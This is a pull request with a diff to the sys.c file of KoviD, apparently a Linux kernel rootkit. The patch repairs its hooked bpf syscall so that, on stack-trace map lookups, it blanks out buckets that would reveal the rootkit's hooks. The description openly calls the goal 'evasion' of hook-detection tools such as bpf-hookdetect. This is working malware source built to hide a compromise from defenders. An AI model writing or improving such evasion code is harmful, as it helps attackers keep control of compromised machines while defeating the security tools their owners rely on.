### PR TITLE
m_bpf fix

### DIFF
--- a/src/sys.c
+++ b/src/sys.c
@@ -424,7 +424,7 @@ static asmlinkage long m_bpf(struct pt_regs *regs)
 				goto leave;
 			}
 
-			bucket = xchg(&smap->buckets[id], NULL);
+			bucket = READ_ONCE(smap->buckets[id]);
 			if (!bucket)
 				goto leave;
 

--- a/src/sys.c
+++ b/src/sys.c
@@ -383,14 +383,15 @@ static asmlinkage long m_bpf(struct pt_regs *regs)
 		struct fd f = { .file = file, .flags = 0 };
 		struct bpf_map *map = ks->k_bpf_map_get(f);
 #endif
+		struct bpf_stack_map *smap = NULL;
+
 		if (IS_ERR(map))
 			goto leave;
 
 		if (map->map_type != BPF_MAP_TYPE_STACK_TRACE)
 			goto leave;
 
-		struct bpf_stack_map *smap =
-			container_of(map, struct bpf_stack_map, map);
+		smap = container_of(map, struct bpf_stack_map, map);
 
 		if (!smap) {
 			prerr("smap error\n");
@@ -403,7 +404,7 @@ static asmlinkage long m_bpf(struct pt_regs *regs)
 		// that is about to be returned to userspace. We'll then
 		// read, modify, and write it back. The goal is to nullify
 		// it if there's a match, ensuring it doesn't get used.
-		if (attr->map_type == BPF_MAP_TYPE_PERF_EVENT_ARRAY) {
+		{
 			u32 id;
 			void __user *ukey = u64_to_user_ptr(attr->key);
 			struct stack_map_bucket *bucket;

--- a/src/sys.c
+++ b/src/sys.c
@@ -355,11 +355,15 @@ static asmlinkage long m_bpf(struct pt_regs *regs)
 	union bpf_attr __user *uattr;
 	struct kernel_syscalls *ks;
 	void *key = NULL, *value = NULL;
+	int cmd = (int)PT_REGS_PARM1(regs);
 	unsigned long size = (unsigned int)PT_REGS_PARM3(regs);
 
 	// Call original first this time
 	ret = real_m_bpf(regs);
 	if (ret < 0)
+		goto leave;
+
+	if (cmd != BPF_MAP_LOOKUP_ELEM)
 		goto leave;
 
 	if (!(attr = (union bpf_attr *)kmalloc(size, GFP_KERNEL)))
@@ -379,6 +383,12 @@ static asmlinkage long m_bpf(struct pt_regs *regs)
 		struct fd f = { .file = file, .flags = 0 };
 		struct bpf_map *map = ks->k_bpf_map_get(f);
 #endif
+		if (IS_ERR(map))
+			goto leave;
+
+		if (map->map_type != BPF_MAP_TYPE_STACK_TRACE)
+			goto leave;
+
 		struct bpf_stack_map *smap =
 			container_of(map, struct bpf_stack_map, map);
 


### PR DESCRIPTION
This seems to fix the issue described [here](https://github.com/carloslack/KoviD/issues/211) by changing the checks to focus on the `BPF_MAP_LOOKUP_ELEM` call specifically for the eBPF stack trace maps. The fix worked on both of the tested systems described in the issue. 

I also made a tweak to remove some of the `ENOENT` errors reported by `bpf-hookdetect` since that didn't seem like it was a core part of the evasion.

I kept the issue separate from this PR in case these changes do not actually preserve the intended effects of the hook (e.g., fails to evade a different tool that uses the same technique to detect hooks).